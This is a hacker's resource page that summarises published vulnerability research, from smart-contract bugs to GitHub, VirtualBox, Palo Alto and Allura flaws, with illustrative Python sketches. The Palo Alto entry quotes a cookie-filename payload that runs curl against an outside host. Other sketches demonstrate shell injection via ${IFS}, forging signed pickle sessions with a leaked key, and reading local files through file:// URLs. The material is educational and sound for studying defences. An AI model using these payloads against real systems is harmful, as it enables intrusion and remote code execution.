Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Curvance: Invariants unleashed- 1405

Nat Chin - Trail of Bits    Reference →Posted 1 Year Ago
  • Curvance appears to be a lending and borrowing protocol. To ensure their protocol was secure, they asked Trail of Bits to write a large number of fuzz tests for their project. This included raw fuzzing to look for crashes as well as invariant fuzzing to ensure that the protocol works as intended.
  • What are invariants? They are core properties of the system that should always hold true. I felt that the invariants here leaned more toward specific functionality than high-level properties, but that is just semantics. As an example, from the VeCVE functional invariants: "Calls to createLock with an amount value less than WAD fail."
  • Many of the invariants were extremely specific to the functionality, in the spirit of "what would be bad if X went wrong?". Once the invariants were hooked into the Echidna fuzzer with a sufficient harness, they let it go to work and found 12 unique bugs, including a few fairly catastrophic vulnerabilities. To me, the main reason this works is that the checks were tailored so tightly to individual pieces of functionality. People think fuzzing is the easy way, which really isn't the case.
  • The report notes some limitations with this setup though. Oracle prices and external token interactions are good examples of state explosion if not properly restricted, so they had to significantly simplify the setup to make the fuzzing work. Overall, a good reference for writing deep invariants in order to find deep bugs!
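The property-based setup can be sketched outside of Solidity too. Below is a minimal Python fuzz loop in the spirit of an Echidna campaign; `VeCVEModel` is a toy stand-in I wrote for illustration, not the real Curvance code or harness. It checks the quoted invariant: calls to `create_lock` with an amount below WAD must fail.

```python
import random

WAD = 10**18

class VeCVEModel:
    """Toy stand-in for the VeCVE locking contract (hypothetical model,
    not the actual Curvance code)."""
    def __init__(self):
        self.locks = []

    def create_lock(self, amount: int) -> None:
        # The behavior the invariant demands: reject amounts below WAD.
        if amount < WAD:
            raise ValueError("amount below WAD")
        self.locks.append(amount)

def invariant_small_locks_fail(model: VeCVEModel, amount: int) -> bool:
    """'Calls to createLock with an amount value less than WAD fail.'"""
    if amount >= WAD:
        return True  # the invariant only constrains small amounts
    try:
        model.create_lock(amount)
    except ValueError:
        return True
    return False  # a small lock succeeded: invariant violated

# Minimal random fuzz loop: throw inputs at the model, assert the property.
model = VeCVEModel()
for _ in range(10_000):
    amount = random.randrange(0, 2 * WAD)
    assert invariant_small_locks_fail(model, amount)
```

Echidna does the same thing against the real EVM bytecode, with coverage guidance and a proper harness; the value is in how specific the property is.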

mXSS cheatsheet- 1404

Sonar Source    Reference →Posted 1 Year Ago
  • Mutation XSS (mXSS) is a type of XSS that arises from browser quirks in HTML parsing; in particular, how the browser rewrites HTML it considers invalid, or what happens when the parsing context changes.
  • The HTML specification is long, so this is a nice cheatsheet for testing for these types of issues. In many of the SonarSource team's recent XSS findings, they abuse the different parsing contexts (HTML, MathML, and SVG) to cause lots of problems. Nothing in particular stands out to me, but this is worth saving as a resource.

Send()-ing Myself Belated Christmas Gifts - GitHub.com's Environment Variables & GHES Shell- 1403

Ngo Wei Lin    Reference →Posted 1 Year Ago
  • GitHub Enterprise Server (GHES) is a locally hosted version of GitHub that teams can run. It offers the same functionality as the regular GitHub service and is written in Ruby.
  • Reflection in Ruby can be used to call arbitrary methods on an object. This works because of an inheritance structure similar to that of JavaScript. By calling Kernel#send() on an object, arbitrary methods can be invoked on it. The author decided to look into potential sinks where this could be called, since it's a known RCE sink.
  • While researching possible exploit methods, they noticed that RCE would require at least two controlled parameters; they didn't see any paths with one or zero. They did, however, find a case of reflection with zero inputs at Organizations::Settings::RepositoryItemsComponent. From there, they wrote a script to enumerate the available functions and variables worth looking at within the Ruby console.
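The enumeration idea translates to other reflective languages. The original script was Ruby; here is a hedged Python sketch (`SessionStore` is a made-up target object, not anything from GHES) that lists the methods on an object callable with zero arguments, the same filter the author applied to `send()` candidates.

```python
import inspect

class SessionStore:
    """Hypothetical target object, standing in for whatever the
    reflection sink dispatches on."""
    secret = "prod-key"            # attribute, not callable: ignored
    def dump_env(self):            # zero-argument: a candidate
        return {"GH_TOKEN": "..."}
    def reset(self, hard):         # needs an argument: excluded
        return hard

def zero_arg_methods(obj):
    """Enumerate methods invokable with no arguments, the equivalent of
    hunting for obj.send(:name) calls that need zero inputs."""
    found = []
    for name in dir(obj):
        if name.startswith("_"):
            continue
        attr = getattr(obj, name)
        if not callable(attr):
            continue
        try:
            sig = inspect.signature(attr)
        except (TypeError, ValueError):
            continue  # some builtins have no introspectable signature
        # Keep it only if every parameter is optional or var-args.
        if all(p.default is not inspect.Parameter.empty
               or p.kind in (p.VAR_POSITIONAL, p.VAR_KEYWORD)
               for p in sig.parameters.values()):
            found.append(name)
    return found

methods = zero_arg_methods(SessionStore())
assert methods == ["dump_env"]  # reset(hard) requires an argument
```

Against an object with 5K methods, a filter like this is what turns "reflection exists" into a workable list of things to try.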
  • While testing this, they noticed a couple of weird things. First, even if a call has required parameters, the function can still be invoked with default values. Additionally, the object with the reflection issue had 5K different functions!? During local testing, their GHES instance broke, and while it was repairing itself they decided to mess around on standard GitHub.
  • The function nw_fsck() was calling spawn_git, which returned a list of environment variables for the GitHub server itself! To the author's surprise, this contained a lot of production access keys. How did this happen!? Upon finding this, they reported the vulnerability to GitHub to get it fixed.
  • Ruby on Rails uses a serialized session that is signed. If it can be tampered with, RCE can be trivially obtained using Ruby deserialization primitives, such as with iblue's technique. Having access to the signing keys is therefore a devastating primitive.
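To see why a leaked signing key is so bad, here is a simplified Python model of a signed, serialized session. Rails actually uses Marshal and its own cookie format; the `payload--signature` layout below is my assumption purely for illustration. Anyone holding the key can mint a blob that passes verification, and the server then deserializes attacker-controlled bytes.

```python
import base64
import hashlib
import hmac
import pickle

SECRET = b"leaked-session-key"   # the kind of key exposed in the env dump

def sign_session(data: dict, key: bytes) -> bytes:
    """Serialize and sign a session, Rails-cookie-store style
    (simplified sketch: base64(payload) + '--' + hex HMAC)."""
    payload = base64.b64encode(pickle.dumps(data))
    sig = hmac.new(key, payload, hashlib.sha256).hexdigest().encode()
    return payload + b"--" + sig

def load_session(cookie: bytes, key: bytes) -> dict:
    payload, sig = cookie.rsplit(b"--", 1)
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("bad signature")
    # With the key leaked, this line deserializes attacker bytes; with
    # pickle (or Ruby Marshal), that is exactly the RCE primitive.
    return pickle.loads(base64.b64decode(payload))

forged = sign_session({"user": "admin"}, SECRET)
assert load_session(forged, SECRET) == {"user": "admin"}
```

The signature only proves the cookie came from someone with the key; once the key leaks, "signed" stops meaning "trusted".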
  • The difference between a local and a global instance of GitHub is interesting in this context. Accessing data globally is scary and all angles must be considered, especially with things like GitHub Actions. The enumeration of exploit paths for the deserialization was also interesting to me. The bug itself was simple, but finding meaningful impact was very difficult. Overall, a great post for a super impactful bug!

How 18-Year-Old Me Discovered a VirtualBox VM Escape Vulnerability- 1402

Jonathan Jacobi    Reference →Posted 1 Year Ago
  • The author of this post decided to take a trip down memory lane by reviewing a vulnerability they found in VirtualBox 5 years ago. The post is heavy into the methodology, which I always appreciate!
  • While doing recon and looking at previous research, they concluded that VBVA (VirtualBox Video Acceleration) was a good target. Why? Video subsystems are known to be hard to implement securely, not just in VirtualBox but in other virtualization software as well, because they involve lots of pointer and offset handling that can lead to memory corruption.
  • To work through the source code, they started by looking for sources: any input directly controlled by users within the virtual machine. They were curious about how integer overflows were being prevented. One common approach is storing the product of two smaller integers in a wider integer, such as multiplying uint16_t values into a uint32_t. Although this is fine in most cases, here there is an additional multiplication by 4 that can cause an overflow.
  • What can we do with this? The height * width * 4 value is used for a sanity check to ensure we're not writing outside the bounds of the VRAM buffer. However, since this value can overflow, the check passes and we can cause memory corruption in later writes. They noticed that the function crMClrFillMem(), used for filling in a rectangle image, can be made to write outside of the buffer! The OOB write has a controlled value and a controlled offset, which is an amazing primitive. The same bug also grants an OOB read.
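The arithmetic is easy to reproduce. This Python sketch emulates the C behavior with 32-bit masking; the VRAM size and the exact dimensions are made up, only the wrap-around pattern matches the post.

```python
U32 = 0xFFFFFFFF
VRAM_SIZE = 16 * 1024 * 1024   # hypothetical 16 MiB VRAM buffer

def checked_size(width: int, height: int) -> int:
    """Mimic the C code: uint16 inputs multiplied into a uint32, then
    scaled by 4 bytes per pixel. The final multiply can wrap the uint32."""
    pixels = (width * height) & U32   # uint16 * uint16 fits in uint32: fine
    return (pixels * 4) & U32         # * 4 can overflow: the bug

width, height = 0xFFFF, 0x4001        # attacker-chosen dimensions
real_bytes = width * height * 4       # true size, no wrapping
wrapped = checked_size(width, height)

# 0xFFFF * 0x4001 = 0x4000BFFF pixels; * 4 = 0x10002FFFC, wraps to 0x2FFFC
assert wrapped <= VRAM_SIZE       # the bounds check passes...
assert real_bytes > VRAM_SIZE     # ...but the actual write is far larger
```

The fix pattern is to widen before the *last* multiplication (or check `pixels > U32 // 4` first), not just before the first one.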
  • Overall, a good post on the discovery of a super powerful vulnerability within VirtualBox. Personally, I don't like the overflow-prevention strategy used, as it seems error prone once extra arithmetic gets added.

Non-Compliant, So What?- 1401

QuarksLab    Reference →Posted 1 Year Ago
  • Cryptography feels like black magic. When auditing code at QuarksLab, there are many little things they report that don't immediately kill the security of the implementation. In this article, they explain those little things and why they're still important to fix.
  • Non-standard means that something out of the ordinary is being done, for instance using an untested/less used primitive like the MARS cipher. Although such choices may not pose a threat at the moment, things that are not battle tested may have unexpected issues.
  • Non-standard usage is using a primitive in a weird or wrong way. A common example is using a bad random number generator, or generating an IV via a key generation function.
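As a small illustration of the bad-RNG case, the sketch below contrasts a seedable Mersenne Twister with a CSPRNG for IV generation. The function names and sizes are mine, not from the article.

```python
import random
import secrets

def weak_iv() -> bytes:
    """Non-standard usage: a Mersenne Twister seeded in a guessable way
    (here, a fixed seed) is fully predictable, so it must never produce
    IVs or key material."""
    rng = random.Random(1337)              # attacker can guess the seed
    return bytes(rng.randrange(256) for _ in range(16))

def strong_iv() -> bytes:
    """The standard choice: an OS-backed CSPRNG."""
    return secrets.token_bytes(16)

# The weak IV is reproducible by anyone who knows (or brute-forces) the
# seed: two "independent" generations are identical.
assert weak_iv() == weak_iv()
```

The point isn't that this breaks today; it's that predictable randomness silently voids the security proofs the primitives rely on.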
  • Next, they talk about things that are low security but still technically secure: things with no impact at the moment that may matter in the future or if changes are made. Examples include using RSA keys not much larger than the largest modulus that has been publicly factored, or using a non-standard iteration count (200 vs 210, for instance).
  • The most interesting to me was "safety net saves all". This is where there is a vulnerability in part of the implementation, but some feature or use case, intended or unintended, saves the day. It is akin to stacking multiple low walls.
  • I've seen the safety net saves all on multiple occasions but absolutely hate it. A section of code may be secure given the current use case but insecure in another. Down the road, the developers may use it in the insecure way, forgetting what was said about it.
  • At the end, they mention that some clients have asked them to change the attacker model to make the system feel more secure: for instance, treating a server in the middle as fully trusted, using a third-party solution, or doing a plain rewrite.
  • Overall, a good post on minimal impact issues and how to talk about them with clients.

Aptos Security Page- 1400

Aptos    Reference →Posted 1 Year Ago
  • Every programming language has its pros and cons in terms of security. This article from Aptos is about writing secure smart contracts in the Move programming language.
  • Access control is the first thing listed, with several subcategories; it's probably the most important thing to look out for. Move, similar to Solana, accepts a signer object for the calling user, and using it in the proper places is important.
  • Similar to Solidity, different functions have different visibilities. entry is used for entrypoints into modules. friend functions are accessible only to specific, declared modules. view functions only read data. public functions are accessible from other modules as well. private functions are only accessible by the module itself.
  • The next category stems from types and data structures. First, they talk about generic type checks: when taking in a generic type, proper validation is needed to ensure there are no weird type confusions. phantom type parameters should be used to prevent this.
  • The other data-structure item is resource management and unbounded execution: being careful with unbounded data storage, unbounded array iteration, and the like.
  • Move abilities are a set of permissions that control the actions on data structures. These act as defense-in-depth measures to ensure specific operations do not happen. The four capabilities are copy, drop, store and key.
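A rough way to picture abilities is as a permission set attached to each type. The Python sketch below is only an analogy (Move enforces this at the type-system level at compile time, and `Resource` here is hypothetical):

```python
from dataclasses import dataclass

@dataclass
class Resource:
    """Hypothetical model of a Move struct and its declared abilities."""
    name: str
    abilities: frozenset = frozenset()

def can_copy(r: Resource) -> bool:    # value may be duplicated
    return "copy" in r.abilities

def can_drop(r: Resource) -> bool:    # value may be silently discarded
    return "drop" in r.abilities

def can_store(r: Resource) -> bool:   # value may nest inside other structs
    return "store" in r.abilities

def has_key(r: Resource) -> bool:     # value may live in global storage
    return "key" in r.abilities

# A coin-like resource: storable, but never copyable or droppable, so
# money can't be duplicated or silently burned.
coin = Resource("Coin", frozenset({"store"}))
assert can_store(coin)
assert not can_copy(coin) and not can_drop(coin)
```

The defense-in-depth framing in the post comes from exactly this: omitting an ability makes a whole class of bad operations unrepresentable.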
  • Now, for something specific to Aptos. When creating an object the ConstructorRef should not be controllable by end users or passed around. If it is, then resources can be added to it or changed directly in storage.
  • Individual assets should also be stored in separate objects. Otherwise, transferring ownership of the containing object hands everything inside it to the new user.
  • The final section is about business logic. Aptos is still vulnerable to oracle manipulation and frontrunning. Overall, a good overview of Aptos security for somebody who has never looked into it.

Hedgey Finance Hack- 1399

CubeAI    Reference →Posted 1 Year Ago
  • Hedgey Finance is a token vesting and locking tool. I linked one article, but I also like the Rekt News article.
  • During campaign creation, the user transfers the tokens to be locked into a smart contract for later use. When doing this, the contract grants an allowance to a manager contract to spend the funds. If a user cancels the campaign prior to it starting, they are refunded all of the value they put in.
  • The vulnerability is that the allowance is not revoked when the campaign is canceled, which leads to a super easy to exploit double spend.
  • The attacker wanted to maximize the damage. They took out a USDC flash loan from Balancer to create and then cancel the campaign. To avoid bots frontrunning the exploit, they did those steps in a first transaction and then waited a bit. After waiting, they abused the $1.3M allowance left over from the cancellation to steal all of the funds. Boom, money stolen!
  • This had been previously audited, but the bug was not found. I had never seen the pattern of a smart contract giving an allowance out to users before. Overall, a fairly simple approval bug in a weird context.
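The whole exploit fits in a toy model. The Python below is a deliberately simplified sketch of the flawed flow; the contract names, the spender direction, and the amounts are my assumptions, not Hedgey's actual code. Cancel refunds the deposit but leaves the allowance alive, so a flash-loaned deposit plus an immediate cancel yields a stale allowance to drain with.

```python
class Token:
    """Minimal ERC-20-style balance/allowance model (illustrative only)."""
    def __init__(self, balances):
        self.balances = dict(balances)
        self.allowances = {}                 # (owner, spender) -> amount

    def approve(self, owner, spender, amount):
        self.allowances[(owner, spender)] = amount

    def transfer_from(self, spender, owner, to, amount):
        assert self.allowances.get((owner, spender), 0) >= amount
        assert self.balances.get(owner, 0) >= amount
        self.allowances[(owner, spender)] -= amount
        self.balances[owner] -= amount
        self.balances[to] = self.balances.get(to, 0) + amount

class Campaign:
    """Sketch of the flawed flow: cancel refunds the deposit but never
    revokes the allowance granted during creation."""
    def __init__(self, token):
        self.token = token

    def create(self, creator, amount):
        # Creator deposits; the contract grants a spending allowance
        # (modeled here as creator-spendable for brevity).
        self.token.balances[creator] -= amount
        self.token.balances["campaign"] = \
            self.token.balances.get("campaign", 0) + amount
        self.token.approve("campaign", creator, amount)

    def cancel(self, creator, amount):
        self.token.balances["campaign"] -= amount
        self.token.balances[creator] += amount
        # BUG: the allowance from create() is left untouched.

# Attack: flash-loaned deposit, cancel, then drain via the stale allowance.
token = Token({"attacker": 1_000_000, "campaign": 1_300_000})
camp = Campaign(token)
camp.create("attacker", 1_000_000)
camp.cancel("attacker", 1_000_000)
token.transfer_from("attacker", "campaign", "attacker", 1_000_000)
assert token.balances["attacker"] == 2_000_000  # others' funds drained
```

The one-line fix is equally simple: `cancel` must zero the allowance it granted.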

Issues in Certain Forks of Gains Network- 1398

Zellic    Reference →Posted 1 Year Ago
  • Gains is a leverage-trading platform: users can provide a small amount of funds yet still gain high exposure to a given asset, with leverage amplifying gains or losses by a multiple. There are two special order features: stop loss and take profit. A stop loss closes the current position after an X% decrease in price, while a take profit cashes out once a specific price point has been hit.
  • On Gains, regardless if it's a long or short, there are three types of orders:
    • Market: Open a trade immediately.
    • Limit: Go long on a lower price than present or reversed for short.
    • Stop Limit: Go long on a higher price than present or reversed for short.
  • The trade struct has several fields, including tp for take profit and sl for stop loss. If the open price was 1K with 5x leverage and the SL was 900, then a price at or below the SL would give a -50% return. All of this is standard for the protocol.
  • In the function that does the calculations above, there is some logic for figuring out payouts that deals with negative numbers. If the field t.openPrice ends up below t.sl, the current pricing model breaks: if the token drops on a long, we'd gain unintended profit. By setting up the trade parameters in a very specific way, including specific order types, it was possible to trigger this condition.
  • After finding this bug, they kept looking and found another one! The function _currentPercentProfit casts currentPrice (which is supplied by end users) from an unsigned integer to a signed integer. By specifying an extremely large price, it wraps around to a negative value! Since shorts and longs pay out in opposite directions, a negative price flips the computed profit in the attacker's favor.
  • After doing both of these tricks, the position could be immediately closed for a 900% profit. Crazily enough, the profit didn't depend on the movement of the token because of the confusion between the different types.
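The second bug is just two's-complement reinterpretation. A minimal sketch, assuming a 256-bit Solidity-style word (the post's exact integer widths are not reproduced here):

```python
BITS = 256  # assumed Solidity-style word size

def to_signed(value: int, bits: int = BITS) -> int:
    """Reinterpret an unsigned integer's bit pattern as two's-complement
    signed: the effect of an int256(uint256_value)-style cast."""
    value &= (1 << bits) - 1
    return value - (1 << bits) if value >= 1 << (bits - 1) else value

assert to_signed(1_000) == 1_000     # sane prices stay positive
assert to_signed(2**255 + 1) < 0     # huge user-supplied price flips sign
assert to_signed(2**256 - 1) == -1
```

Any user-supplied value crossing an unsigned-to-signed cast needs a range check first; otherwise the top bit becomes an attacker-controlled sign bit.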
  • To fix both bugs, an invariant check was added to ensure sl/tp stay within the proper bounds. I'm hopeful they introduced more patches than just invariant checks, but invariant checks are amazing for killing exploit paths like this one.
  • Given my inexperience with leveraged trading and the Gains network logic, I found the first bug hard to understand. It seems it was simply a logic flaw that broke an invariant of the protocol. To me, it was interesting to see the mindset of "can we make this value greater than that one, because that would be bad", which led them to the bugs in the end. Good finds!

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)- 1397

WatchTowr    Reference →Posted 1 Year Ago
  • While fuzzing the GlobalProtect portal on a Palo Alto firewall, they noticed some interesting behavior in the logs. If they attached a semicolon to the SESSID cookie value, a strange log showed up: failed to unmarshal session(peekaboo) map, EOF. The EOF stands for end of file, which is super interesting. This is where the bug begins!
  • The EOF indicates that it's reading a file, and since we added the semicolon, no file with that name exists. Adding in a slash for a directory gives us the nicer error failed to load file. Sick! It's reading a file whose name we control. What about directory traversal?
  • If it cannot find the directory, it will attempt to create it. If the file doesn't exist, it simply creates a zero-byte file with the filename intact. By itself, this doesn't seem to have much impact. However, weird primitives break security assumptions elsewhere, so all we have to do is find some rule we can now violate.
  • The telemetry code ingests log files, and when doing so it builds a curl command executed through a shell to transfer the file. Now there is an arbitrary filename inside a shell command; that previous primitive seems super nice now! While playing around with this, they noticed that spaces weren't allowed within cookie values, so we have to get creative!
  • ${IFS} can be used as a space within bash. So, if we create a filename with shell metacharacters, like semicolons or backticks, we can inject arbitrary commands! For instance, creating a file in the logs directory via traversal with `curl${IFS}x1.outboundhost.com` in the name will trigger an outbound curl request. Neat!
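The injection pattern is easy to demo safely. Below, a benign Python sketch interpolates an attacker-style filename (my own harmless payload, not the real one) into a shell command, then shows the quoted-safe variant. Like the post's payload, it avoids literal spaces by leaning on ${IFS}.

```python
import shlex
import subprocess

# Attacker-controlled "filename" created via the arbitrary file write:
# no spaces, using ${IFS} as the word separator, semicolon to chain.
filename = "x.log;echo${IFS}INJECTED"

# Vulnerable pattern: interpolating the untrusted name into a shell
# command line, as the telemetry code did when building its curl call.
vuln = subprocess.run("echo processing " + filename,
                      shell=True, capture_output=True, text=True)
assert vuln.stdout == "processing x.log\nINJECTED\n"   # injection ran

# Safe pattern: quote the untrusted value (or avoid the shell entirely
# by passing an argument list with shell=False).
safe = subprocess.run("echo processing " + shlex.quote(filename),
                      shell=True, capture_output=True, text=True)
assert safe.stdout == "processing x.log;echo${IFS}INJECTED\n"
```

Inside single quotes the payload is inert: no command chaining, no ${IFS} expansion.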
  • Although not mentioned in the original post, the vulnerability appears to be within an underlying library called Gorilla sessions. So, this primitive of writing arbitrary files likely affects A LOT more things than just this application.
  • Overall, an awesome post on a bizarre command injection. It took a weird arbitrary file write to trigger, but was interesting. To me, a takeaway is that fuzzing is not launch-and-forget: reading the error messages, responses, and all other available information to look for weird behavior is worthwhile.

Dangerous Import: SourceForge Patches Critical Code Vulnerability- 1396

Stefan Schiller - Sonar Source    Reference →Posted 1 Year Ago
  • Apache Allura is used by many popular products. It is a platform that manages source code, bug reports, discussions, and many other things. SourceForge uses it under the hood.
  • Within the discussion area, users can import/export via arbitrary URLs. Even though the input should only ever be an http(s) URL, the file:// scheme can be used. The fetched file is then stored locally, giving both an arbitrary file read and SSRF in one bug.
  • Using this, it's possible to read /etc/passwd. However, we can do better than that! Allura contains a global session key used to sign the sessions, which are pickle-serialized. By reading the configuration file, it's possible to steal the key! Since we can now sign pickle-serialized session payloads, we get trivial code execution.
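The scheme check behind the remediation is a one-liner worth internalizing. Here is a hedged Python sketch (the function name and allowlist are mine; this is not Allura's actual code) showing that urllib will happily read local files through file:// unless the scheme is checked first:

```python
import tempfile
import urllib.request
from urllib.parse import urlparse

def fetch(url: str, allowed=("http", "https")) -> bytes:
    """Import-style fetch with the fix applied: reject any URL whose
    scheme isn't explicitly allowed (file://, ftp://, ...)."""
    if urlparse(url).scheme.lower() not in allowed:
        raise ValueError("scheme not allowed")
    with urllib.request.urlopen(url) as resp:
        return resp.read()

# Without the check, urllib reads local files via file:// just fine.
with tempfile.NamedTemporaryFile(suffix=".ini") as f:
    f.write(b"session_key = secret")
    f.flush()
    leaked = urllib.request.urlopen("file://" + f.name).read()
    assert leaked == b"session_key = secret"

# With the check, the same class of URL is rejected before any I/O.
try:
    fetch("file:///etc/passwd")
    raise AssertionError("file:// should have been blocked")
except ValueError:
    pass
```

Note the real fix also blocks local/internal IPs for the SSRF half; an allowlisted scheme alone doesn't stop `http://169.254.169.254/`-style targets.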
  • I think the remediation is interesting. First (and most obvious), the URL is checked to be http/https, with additional SSRF checks to ensure it doesn't point at a local IP. Second, the pickle session storage was replaced with a JWT implementation to prevent RCE via this path ever again. Overall, a simple bug leading to RCE in a popular project.